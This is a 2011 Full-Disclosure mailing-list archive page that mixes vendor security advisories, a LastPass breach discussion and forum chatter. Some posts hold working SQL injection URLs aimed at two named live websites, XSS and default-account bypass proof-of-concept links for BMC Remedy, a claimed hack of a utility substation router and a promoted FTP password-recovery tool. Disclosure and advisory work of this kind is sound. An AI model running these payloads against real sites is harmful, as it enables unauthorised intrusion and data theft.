[Full-disclosure] [USN-1122-2] Thunderbird vulnerabilities
== Ubuntu Security Notice USN-1122-2 May 05, 2011 thunderbird vulnerabilities == A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.04 Summary: Thunderbird could be made to run programs as your login if it opened specially crafted mail. Software Description: - thunderbird: mail/news client with RSS and integrated spam filter support Details: USN-1122-1 fixed vulnerabilities in Thunderbird for Lucid and Maverick. This update provides the corresponding fixes for Natty. Original advisory details: It was discovered that there was a vulnerability in the memory handling of certain types of content. An attacker could exploit this to possibly run arbitrary code as the user running Thunderbird. (CVE-2011-0081) It was discovered that Thunderbird incorrectly handled certain JavaScript requests. If JavaScript were enabled, an attacker could exploit this to possibly run arbitrary code as the user running Thunderbird. (CVE-2011-0069) Ian Beer discovered a vulnerability in the memory handling of a certain types of documents. An attacker could exploit this to possibly run arbitrary code as the user running Thunderbird. (CVE-2011-0070) Bob Clary, Henri Sivonen, Marco Bonardo, Mats Palmgren and Jesse Ruderman discovered several memory vulnerabilities. An attacker could exploit these to possibly run arbitrary code as the user running Thunderbird. (CVE-2011-0080) Aki Helin discovered multiple vulnerabilities in the HTML rendering code. An attacker could exploit these to possibly run arbitrary code as the user running Thunderbird. (CVE-2011-0074, CVE-2011-0075) Ian Beer discovered multiple overflow vulnerabilities. An attacker could exploit these to possibly run arbitrary code as the user running Thunderbird. (CVE-2011-0077, CVE-2011-0078) Martin Barbella discovered a memory vulnerability in the handling of certain DOM elements. An attacker could exploit this to possibly run arbitrary code as the user running Thunderbird. (CVE-2011-0072) It was discovered that there were use-after-free vulnerabilities in Thunderbird's mChannel and mObserverList objects. An attacker could exploit these to possibly run arbitrary code as the user running Thunderbird. (CVE-2011-0065, CVE-2011-0066) It was discovered that there was a vulnerability in the handling of the nsTreeSelection element. An attacker sending a specially crafted E-Mail could exploit this to possibly run arbitrary code as the user running Thunderbird. (CVE-2011-0073) Paul Stone discovered a vulnerability in the handling of Java applets. If plugins were enabled, an attacker could use this to mimic interaction with form autocomplete controls and steal entries from the form history. (CVE-2011-0067) Soroush Dalili discovered a vulnerability in the resource: protocol. This could potentially allow an attacker to load arbitrary files that were accessible to the user running Thunderbird. (CVE-2011-0071) Chris Evans discovered a vulnerability in Thunderbird's XSLT generate-id() function. An attacker could possibly use this vulnerability to make other attacks more reliable. (CVE-2011-1202) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.04: thunderbird 3.1.10+build1+nobinonly-0ubuntu0.11.04.1 After a standard system update you need to restart Thunderbird to make all the necessary changes. References: CVE-2011-0065, CVE-2011-0066, CVE-2011-0067, CVE-2011-0069, CVE-2011-0070, CVE-2011-0071, CVE-2011-0072, CVE-2011-0073, CVE-2011-0074, CVE-2011-0075, CVE-2011-0077, CVE-2011-0078, CVE-2011-0080, CVE-2011-0081, CVE-2011-1202 Package Information: https://launchpad.net/ubuntu/+source/thunderbird/3.1.10+build1+nobinonly-0ubuntu0.11.04.1 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Leakdirectory: call for contribution
Hi guys, we setup a wiki-based directory of leaksites and transparency ecosystem available on: http://leakdirectory.org We would be pleased to have contribution in working on the wiki and on the project. Anonymous contributions are welcome, the wiki is open for editing. -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook
+1. General rule of the thumb (which has served me well), is that the govt + company who holds your info, can do whatever they want. Laws are bent and broken every single day by these people in charge. Sucks, I know, but that's the world we live in, I'm afraid ;/ On Wed, May 4, 2011 at 1:46 PM, valdis.kletni...@vt.edu wrote: On Wed, 04 May 2011 15:13:37 +0300, n...@myproxylists.com said: found this Facebook Law Enforcement Guidelines http://exit.gulli.com/url/http://info.publicintelligence.net/Facebook2010.pdf Interesting. Their guideline does not say anything about a court order so we can assume they give all personal data upon request just like that. Welcome to the real world. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] conservative.ca SQLi
http://www.conservative.ca/index.php?section_copy_id=21257ï http://www.conservative.ca/index.php?section_copy_id=21257%C3%AF ¿½ion_i' AND (SELECT 3997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,108,121,58),(SELECT (CASE WHEN (3997=3997) THEN 1 ELSE 0 END)),CHAR(58,112,119,105,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'NHNb'='NHN I'll just leave this here http://www.brymark.com/cboutique/index2.cfm?view=prodscatID=UNION/*a*/SELECT/*a*/0;--subcatID=446prodMakeID=5533# http://www.conservative.ca/action_centre/enews_signup?language_id=%27 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] conservative.ca SQLi
http://www.conservative.ca/index.php?section_copy_id=21257ï http://www.conservative.ca/index.php?section_copy_id=21257%C3%AF ¿½ion_i' AND (SELECT 3997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,108,121,58),(SELECT (CASE WHEN (3997=3997) THEN 1 ELSE 0 END)),CHAR(58,112,119,105,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'NHNb'='NHN I'll just leave this here http://www.brymark.com/cboutique/index2.cfm?view=prodscatID=UNION/*a*/SELECT/*a*/0;--subcatID=446prodMakeID=5533# http://www.conservative.ca/action_centre/enews_signup?language_id=%27 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook
Amish not being in the regular databases cause they don't use technology (i.e., like Facebook, or any of the other databases mentioned previously). A better way to word It wouldn't just be a selective subset but pretty much who, where, when and probably why without too many non-Amish exceptions. would have been It wouldn't just be a select subset of people, but basically the who, where, when, and why of almost everyone, with little to no exceptions (aside from the Amish and suchlike folk, who obviously don't use technology). Make sense now? :D On 05/04/2011 08:28 PM, Cal Leeming wrote: Forgive me for being dense but, what does non-Amish exceptions means?? On Wed, May 4, 2011 at 11:49 AM, Michael Simpson mikie.simp...@gmail.com mailto:mikie.simp...@gmail.com wrote: On 4 May 2011 04:59, phil ja...@jabea.net mailto:ja...@jabea.net wrote: I don’t agree, google is by far the biggest database of what user want and look for. If you merge those database (google) and facebook that must make some leet profiling. (especially when you think that you can easily find where someone live with phone directory and you can match the ip by sector too to match the google database) some leet profiling if you look at what netflix (supposedly anonymised) + imdb was able to do, or the classic of AOL releasing their searches (again anonymised) then a join of google with facebook is quite a scary prospect. Especially as d of b + partial zip/postcode allows for re-identification most of the time (i believe that d of b + state = 85% re-identification). It wouldn't just be a selective subset but pretty much who, where, when and probably why without too many non-Amish exceptions. mike ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Lastpass Security Issue
Hey all, Early this morning the folks over at LastPass decided to issue a warning about a potential security issue based on the fact that they detected some anomalies in their logs. http://blog.lastpass.com/2011/05/lastpass-security-notification.html Basically the post outlines the fact that even though they've investigated everything they can think of, they still noticed data potentially being exfiltrated from one of their DBs, as more information came out then was going in. Because of the fact they can't account for the traffic from any legitimate source, they're being paranoid and assuming the worst (that someone found a SQL injection presumably). Even though their passwords were all salted, they're still forcing everyone to change their master password. Those using 2-factor are relatively un-affected, although they have to change their master passwords as well. This might leave some people who use lastpass in 'Re-enable account hell', where they have their email password stored on lastpass, but can't verify and login to lastpass without clicking an activation link in their email. This can be solved by using one of the plugins in offline mode with your old master password. I'm not sure why they didn't mention it, but this has solved a lot of people's problems. All in all IMHO these guys take security quite seriously. They noticed an anomaly, investigated and hours later posted something about it on their blog. I'm not sure why no emails have been sent out, but there has been speculation that it would have taken too long (http://blog.lastpass.com/2011/05/lastpass-security-notification.html?showComment=1304571300013#c1232708813079521918), which I don't really agree with. That should've been their first step IMHO, and that's where they fell on their face a bit with all this. They DO put impressive security measures into place when something does happen though, as seen in the XSS bug found. They implemented HSTS, X-Frame-Options, CSP, which I've only seen used in super rare cases: http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html They're also implementing PBKDF2, so that makes me feel as though with every security issue they're dealing with they don't just identify and re-mediate, but actually restructure their infrastructure in order to hedge against any potential future attack vectors. I personally see this as the best response of any company I've ever seen from a security standpoint. Thoughts? Ryan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] t2'11: Call for Papers 2011 (Helsinki / Finland)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 # t2'11 - Call For Papers # Helsinki, Finland October 27 - 28, 2011 We are pleased to announce the annual t2'11 infosec conference, which will take place in Helsinki, Finland, from October 27 to 28, 2011. We are looking for original technical presentations in the fields of information security. Presentations should last a minimum of 60 minutes and a maximum of two hours and be presented in English. Please note that presentations that focus on marketing or directly promoting a company's products will not be accepted. We will be accepting talk proposals until July 1, 2011. All submitted presentations will be reviewed by the t2 Advisory Board. As usual selected speakers will be reimbursed for travel and hotel costs. We also proud ourselves of taking good care of the speakers and there is always something going on during the evenings :) We suggest strongly that you submit earlier rather than later, since we will close the CFP early once we receive enough quality submissions to fill the slots. Please include the following with your submission: 1. Contact information (email, cell phone and postal address) 2. Country and city of origin for your travel to the conference, as well as nationality/passport for visa requirements 3. Brief biography (including employer and/or affiliations) 4. Title of the presentation 5. Presentation abstract 6. If your presentation references a paper or piece of software that you have published, please provide us with either a copy of the said paper or software, or an URL where we can obtain it. 7. List any other publications or conferences where this material has been or will be published/submitted Please send the above information to cfp-2011 (at) lists.t2.fi === For more information: http://t2.fi/ Links to past schedules: http://t2.fi/schedules/ - -- Tomi 'T' Tuominen tomi.tuomi...@t2.fi Founder - t2 information security conference tel. +358 400 796 064 - fax. +358 401 796 064 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) iEYEARECAAYFAk3Cr00ACgkQlPoxKJv6bEqbpQCglRzCUNkuEnRUpToR70+vaGM3 NewAn0fu9aEH/kub/GmFHqCMZuprNnxY =wAE6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Latvenergo RIGAS HES-2 HACKED!
Screenshot from Latvenergo Valmeria substation Router: http://imageshack.us/photo/my-images/864/111nk.png/___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Filezilla Password Decryptor Released !
Hi all, FileZillaPasswordDecryptor is the FREE tool to quick scan and recover stored FTP login passwords by FileZilla - most popular FTP client software. For more details and download visit, http://securityxploded.com/filezilla-password-decryptor.php -- With Regards Nagareshwar Talekar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PR10-13: Multiple XSS and Authentication flaws within BMC Remedy Knowledge Management
PR10-13: Multiple XSS and Authentication flaws within BMC Remedy Knowledge Management Vulnerability found: 17th July 2010 Vendor informed: Vulnerability fixed: Severity: High Description: BMC Remedy Knowledge Management provides service desk analysts with a knowledge base of easy-to-find solutions and gives users self-service search options to help them resolve issues on their own. ProCheckUp has discovered that multiple Remedy Knowledge Management pages are vulnerable to reflective XSS attacks, a built in self help account allows for authentication bypass. Version: 7.5.00- http://www.bmc.com/ 1) The following demonstrate the reflective XSS flaws https://target-domain.foo/rkm/external.jsp?doc='%3balert(1)//user=Self+Help https://target-domain.foo/rkm/search.jsp?user=Self+HelpstartDate=\'%3balert(1)// https://target-domain.foo/rkm/usersettings.jsp?;scriptalert(1)/script https://target-domain.foo/rkm/viewdoc.jsp?doc=scriptalert(1)/scriptuser=Self%20Help Works on IE - login screen referrer XSS https://target-domain.foo/rkm/AttachmentServlet?=;scriptalert(1)/script Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link to Remedy Knowledge Management based site. Such code would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: session IDs) to unauthorised third parties. 2) Remedy Knowledge Management is vulnerable to authentication bypass by using a built in default account. (user=Self%20Help) https://target-domain.foo/rkm/index.jsp?user=Self%20Help The following directory requires a password to authenticate only https://target-domain.foo/rkm/configuration Consequences: An attacker may be able to gain access to data held within a Remedy Knowledge Managment based site. Fix: . References: http://www.procheckup.com/Vulnerabilities.php Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com) Legal: Copyright 2010 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Lastpass Security Issue
They've said nothing about what they're going to do to the server with said anomaly. Wouldnt be happy until a full reinstall. On Thu, May 5, 2011 at 11:39 AM, Ryan Sears rdse...@mtu.edu wrote: Hey all, Early this morning the folks over at LastPass decided to issue a warning about a potential security issue based on the fact that they detected some anomalies in their logs. http://blog.lastpass.com/2011/05/lastpass-security-notification.html Basically the post outlines the fact that even though they've investigated everything they can think of, they still noticed data potentially being exfiltrated from one of their DBs, as more information came out then was going in. Because of the fact they can't account for the traffic from any legitimate source, they're being paranoid and assuming the worst (that someone found a SQL injection presumably). Even though their passwords were all salted, they're still forcing everyone to change their master password. Those using 2-factor are relatively un-affected, although they have to change their master passwords as well. This might leave some people who use lastpass in 'Re-enable account hell', where they have their email password stored on lastpass, but can't verify and login to lastpass without clicking an activation link in their email. This can be solved by using one of the plugins in offline mode with your old master password. I'm not sure why they didn't mention it, but this has solved a lot of people's problems. All in all IMHO these guys take security quite seriously. They noticed an anomaly, investigated and hours later posted something about it on their blog. I'm not sure why no emails have been sent out, but there has been speculation that it would have taken too long ( http://blog.lastpass.com/2011/05/lastpass-security-notification.html?showComment=1304571300013#c1232708813079521918), which I don't really agree with. That should've been their first step IMHO, and that's where they fell on their face a bit with all this. They DO put impressive security measures into place when something does happen though, as seen in the XSS bug found. They implemented HSTS, X-Frame-Options, CSP, which I've only seen used in super rare cases: http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html They're also implementing PBKDF2, so that makes me feel as though with every security issue they're dealing with they don't just identify and re-mediate, but actually restructure their infrastructure in order to hedge against any potential future attack vectors. I personally see this as the best response of any company I've ever seen from a security standpoint. Thoughts? Ryan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Lastpass Security Issue
On Thu, May 5, 2011 at 9:09 PM, Benji m...@b3nji.com wrote: They've said nothing about what they're going to do to the server with said anomaly. Wouldnt be happy until a full reinstall. From http://blog.lastpass.com/2011/05/lastpass-security-notification.html : We're rebuilding the boxes in question and have shut down and moved services from them in the meantime. The source code running the website and plugins has been verified against our source code repositories, and we have further determined from offline snapshots and cryptographic hashes in the repository that there was no tampering with the repository itself Is that what you meant ? Nick -- Current Earth status: NOT DESTROYED ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Lastpass Security Issue
Sorry, completely missed that part. My bad. On Thu, May 5, 2011 at 10:35 PM, Nick Boyce nick.bo...@gmail.com wrote: On Thu, May 5, 2011 at 9:09 PM, Benji m...@b3nji.com wrote: They've said nothing about what they're going to do to the server with said anomaly. Wouldnt be happy until a full reinstall. From http://blog.lastpass.com/2011/05/lastpass-security-notification.html: We're rebuilding the boxes in question and have shut down and moved services from them in the meantime. The source code running the website and plugins has been verified against our source code repositories, and we have further determined from offline snapshots and cryptographic hashes in the repository that there was no tampering with the repository itself Is that what you meant ? Nick -- Current Earth status: NOT DESTROYED ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0dayz on the 0day
Oh SNAP! SpongeBob got pwnd! http://pastebin.com/X9SBeH2c Shoutz to Pops, Elmo, my girl Dora, Handy M, and Thomas the Mother f'n Train ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Stuxnet
? On Wed, May 4, 2011 at 10:40 PM, huj huj huj datski...@gmail.com wrote: thank you 2011/5/4 Cal Leeming c...@foxwhisper.co.uk Lol huj, this conversation is over. On 04/05/2011 11:16, huj huj huj wrote: if there were any justice in the world people like you would be infertile 2011/5/4 Cal Leeming f...@foxwhisper.co.uk Not even sure why I'm bothering to respond to this, given the fact you're just trolling.. but.. You ever considered the fact I have children? lol. When you have kids, you soon learn to love everything that your kids love.. But given the fact you are still a young'un, I wouldn't expect you to understand. And also, Njijnte is awesome ;p On 04/05/2011 11:02, huj huj huj wrote: let's just say i don't have japanese childrens posters on my walls.. 2011/5/2 Cal Leeming c...@foxwhisper.co.uk Out of curiosity huj huj huj, how old are you? At the very least, are you older than me?? On Mon, May 2, 2011 at 7:51 PM, huj huj huj datski...@gmail.comwrote: probably not so much stealing as making fun of your teenie way of expressing yourself :) 2011/5/1 Cal Leeming c...@foxwhisper.co.uk Lol @ you stealing my lots of love and xoxo signature... At least come up with your own stuff ;) On Sun, May 1, 2011 at 5:58 PM, Benji m...@b3nji.com wrote: dude if you can't appreciate sharing, it's a better idea to be in silent mode. understand this: = you != everyone in FD hence , you 'know' != everyone in FD knows = Have you guys heard, recently (July 2010) a new form of malware that seemed to target SCADA systems was found, named Stuxnet. Some interesting info here; http://en.wikipedia.org/wiki/Stuxnet Also it contains 6 Windows 0days!!! Anyway, thought you might not know due to FD members apparent inability to read the news. Lots of love, Benji xoxox ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rfxn tools.. anyone tried them?
Just came across this: http://www.rfxn.com/projects/ APF (Advanced Policy Firewall)http://www.rfxn.com/projects/advanced-policy-firewall/ BFD (Brute Force Detection)http://www.rfxn.com/projects/brute-force-detection/ IRSYNC (Incremental Rsync)http://www.rfxn.com/projects/irsync-incremental-rsync/ LES (Linux Environment Security)http://www.rfxn.com/projects/linux-environment-security/ LMD (Linux Malware Detect)http://www.rfxn.com/projects/linux-malware-detect/ LSM (Linux Socket Monitor) http://www.rfxn.com/linux-socket-monitor/ NSIV (Network Socket Inode Validation)http://www.rfxn.com/projects/network-socket-inode-validation/ PRM (Process Resource Monitor)http://www.rfxn.com/projects/process-resource-monitor/ SIM (System Integrity Monitor)http://www.rfxn.com/projects/system-integrity-monitor/ SPRI (System Priority) http://www.rfxn.com/projects/system-priority/ Anyone tried any of these tools out? Gonna have a play around with them tonight :) Cal ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Lastpass Security Issue
+1 reason why people should never used centralized password / form storage tbh. On Thu, May 5, 2011 at 10:09 PM, Benji m...@b3nji.com wrote: They've said nothing about what they're going to do to the server with said anomaly. Wouldnt be happy until a full reinstall. On Thu, May 5, 2011 at 11:39 AM, Ryan Sears rdse...@mtu.edu wrote: Hey all, Early this morning the folks over at LastPass decided to issue a warning about a potential security issue based on the fact that they detected some anomalies in their logs. http://blog.lastpass.com/2011/05/lastpass-security-notification.html Basically the post outlines the fact that even though they've investigated everything they can think of, they still noticed data potentially being exfiltrated from one of their DBs, as more information came out then was going in. Because of the fact they can't account for the traffic from any legitimate source, they're being paranoid and assuming the worst (that someone found a SQL injection presumably). Even though their passwords were all salted, they're still forcing everyone to change their master password. Those using 2-factor are relatively un-affected, although they have to change their master passwords as well. This might leave some people who use lastpass in 'Re-enable account hell', where they have their email password stored on lastpass, but can't verify and login to lastpass without clicking an activation link in their email. This can be solved by using one of the plugins in offline mode with your old master password. I'm not sure why they didn't mention it, but this has solved a lot of people's problems. All in all IMHO these guys take security quite seriously. They noticed an anomaly, investigated and hours later posted something about it on their blog. I'm not sure why no emails have been sent out, but there has been speculation that it would have taken too long ( http://blog.lastpass.com/2011/05/lastpass-security-notification.html?showComment=1304571300013#c1232708813079521918), which I don't really agree with. That should've been their first step IMHO, and that's where they fell on their face a bit with all this. They DO put impressive security measures into place when something does happen though, as seen in the XSS bug found. They implemented HSTS, X-Frame-Options, CSP, which I've only seen used in super rare cases: http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html They're also implementing PBKDF2, so that makes me feel as though with every security issue they're dealing with they don't just identify and re-mediate, but actually restructure their infrastructure in order to hedge against any potential future attack vectors. I personally see this as the best response of any company I've ever seen from a security standpoint. Thoughts? Ryan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security Advisory: DNS BIND Security Advisory: RRSIG Queries Can Trigger Server Crash When Using Response Policy Zones
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Note: https://www.isc.org/CVE-2011-1907 is the authoritative source for this Security Advisory. Please check the source for any updates. Summary: When a name server is configured with a response policy zone (RPZ), queries for type RRSIG can trigger a server crash. CVE: CVE-2011-1907 Posting date: 05 May 2011 Program Impacted: BIND Versions affected: 9.8.0 Severity: High Exploitable: remotely Description: This advisory only affects BIND users who are using the RPZ feature configured for RRset replacement. BIND 9.8.0 introduced Response Policy Zones (RPZ), a mechanism for modifying DNS responses returned by a recursive server according to a set of rules which are either defined locally or imported from a reputation provider. In typical configurations, RPZ is used to force NXDOMAIN responses for untrusted names. It can also be used for RRset replacement, i.e., returning a positive answer defined by the response policy. When RPZ is being used, a query of type RRSIG for a name configured for RRset replacement will trigger an assertion failure and cause the name server process to exit. Workarounds: Install 9.8.0-P1 or higher. Active exploits: None. However, some DNSSEC validators are known to send type=RRSIG queries, innocently triggering the failure. Solution: Use RPZ only for forcing NXDOMAIN responses and not for RRset replacement. CVSS Score: Base 6.1, adjusted for lack of targets, score is 1.5 (AV:N/AC:L/Au:N/C:N/I:N/A:C/E:P/RL:O/RC:C/TD:L) For more information on the Common Vulnerability Scoring System and to obtain your specific environmental score please visit: http://nvd.nist.gov/cvss.cfm?calculatoradvversion=2 Thank you to Mitsuru Shimamura at Internet Initiative Japan for finding this defect. For more information on support and other services for ISC's software products, please visit https://www.isc.org/community/blog/201102/BIND-support For more information about DNS RPZ, please check security advisory @ https://www.isc.org/CVE-2011-1907 Questions about this Security Advisory should be sent to the ISC Security Officer security-offi...@isc.org. -BEGIN PGP SIGNATURE- Version: 10.1.0.860 wsBVAwUBTcM/blVuk3AWv0XzAQhSSAgAlvGfryj+hJ66PcqmTG1bLxUBiRjVgb3S bMAz70oKcNhDL3gFkAbT4I0bLIgUtr59hg4A5rvS6S8GZz/OgkK3J5By7NP+BAUm OUuey2EUUHm1xH8sKMOyHcAb7OHaaI20Bew9nVvHn4V6EYySrnqR7woZblCM+i9x r/YucIL6c2Nrikud3M9sRfQKZmPtVciy2Oh2/miXQT8y5MrZlw5KowzhFc13Vy8O 8FzXpiqyJD6+/zq2J1eCbAe4hNg4FVk59ySy4IKLS1Ni9l3NKFOaljFOitVQ+1xV 9wzj+0mitqfkhPdgJE/n9WqmlSfjX6VLzlKfWR/vW0PS7A16V+kEGA== =tcnF -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] VMSA-2011-0008 VMware vCenter Server and vSphere Client security vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2011-0008 Synopsis: VMware vCenter Server and vSphere Client security vulnerabilities Issue date:2011-05-05 Updated on:2011-05-05 (initial release of advisory) CVE numbers: CVE-2011-0426 CVE-2011-1788 CVE-2011-1789 - 1. Summary VMware vCenter Server directory traversal and information disclosure vulnerabilities. vSphere Client Installer is delivered through an unsigned package. 2. Relevant releases vCenter Server 4.1 GA vCenter Server 4.0 Update 2 and earlier VirtualCenter 2.5 Update 6 and earlier ESXi 4.1 GA ESXi 4.0 without patch ESXi400-201103402-SG ESX 4.1 GA ESX 4.0 without patch ESX400-201103401-SG 3. Problem Description a. vCenter Server Directory Traversal vulnerability A directory traversal vulnerability allows an attacker to remotely retrieve files from vCenter Server without authentication. In order to exploit this vulnerability, the attacker will need to have access to the network on which the vCenter Server host resides. In case vCenter Server is installed on Windows 2008 or Windows 2008 R2, the security vulnerability is not present. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2011-0426 to this issue. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = vCenter4.1 Windows Update 1 * vCenter4.0 Windows Update 3 * VirtualCenter 2.5 Windows Update 6a hosted ** any any not affected ESXi any ESXi not affected ESXany ESX not affected * vCenter 4.1 and vCenter 4.0 installed on Windows 2008 or Windows 2008 R2 is not affected ** hosted products are VMware Workstation, Player, ACE, Fusion. b. vCenter Server SOAP ID disclosure The SOAP session ID can be retrieved by any user that is logged in to vCenter Server. This might allow a local unprivileged user on vCenter Server to elevate his or her privileges. VMware would like to thank Claudio Criscione for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2011-1788 to this issue. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = vCenter4.1 Windows Update 1 vCenter4.0 Windows Update 3 VirtualCenter 2.5 Windows not affected hosted * any any not affected ESXi any ESXi not affected ESXany ESX not affected * hosted products are VMware Workstation, Player, ACE, Fusion. c. vSphere Client Installer package not digitally signed The digitally signed vSphere Client installer is packaged in a self-extracting installer package which is not digitally signed. As a result, when you run the install package file to extract and start installing, the vSphere Client installer may display a Windows warning message stating that the publisher of the install package cannot be verified. The vSphere Client Installer package of the following product versions is now digitally signed: vCenter Server 4.1 Update 1 vCenter Server 4.0 Update 3 ESXi 4.1 Update 1 ESXi 4.0 with patch ESXi400-201103402-SG ESX 4.1 Update 1 ESX 4.0 with patch ESX400-201103401-SG An install or update of the vSphere Client from these releases will not present a security warning from Windows. Note: typically the vSphere Client will request an update if the existing client is pointed at a newer version of vCenter or ESX. VMware Knowledge Base article 1021404 explains how the unsigned install package can be obtained in an alternative, secure way for an environment with VirtualCenter 2.5, ESXi/ESX 3.5 or ESX 3.0.3. VMware would like to thank Claudio Criscione for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2011-1789 to this issue. 4. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. vCenter Server 4.1 Update 1 --- See VMSA-2011-0003 for details. vCenter Server 4.0 Update 3 --- http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_ 0 Release Notes:
Re: [Full-disclosure] Facebook
On Wed, May 4, 2011 at 8:55 AM, Cal Leeming c...@foxwhisper.co.uk wrote: +1. General rule of the thumb (which has served me well), is that the govt + company who holds your info, can do whatever they want. Laws are bent and broken every single day by these people in charge. Sucks, I know, but that's the world we live in, I'm afraid ;/ Archive: The Case Against Retroactive Amnesty for Telecoms, http://www.eff.org/issues/nsa-spying/archive. You gotta be impressed with the US Congress. Not only are they not held accountable for their actions, they spread the immunity around. On Wed, May 4, 2011 at 1:46 PM, valdis.kletni...@vt.edu wrote: On Wed, 04 May 2011 15:13:37 +0300, n...@myproxylists.com said: found this Facebook Law Enforcement Guidelines http://exit.gulli.com/url/http://info.publicintelligence.net/Facebook2010.pdf Interesting. Their guideline does not say anything about a court order so we can assume they give all personal data upon request just like that. Welcome to the real world. [SNIP] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
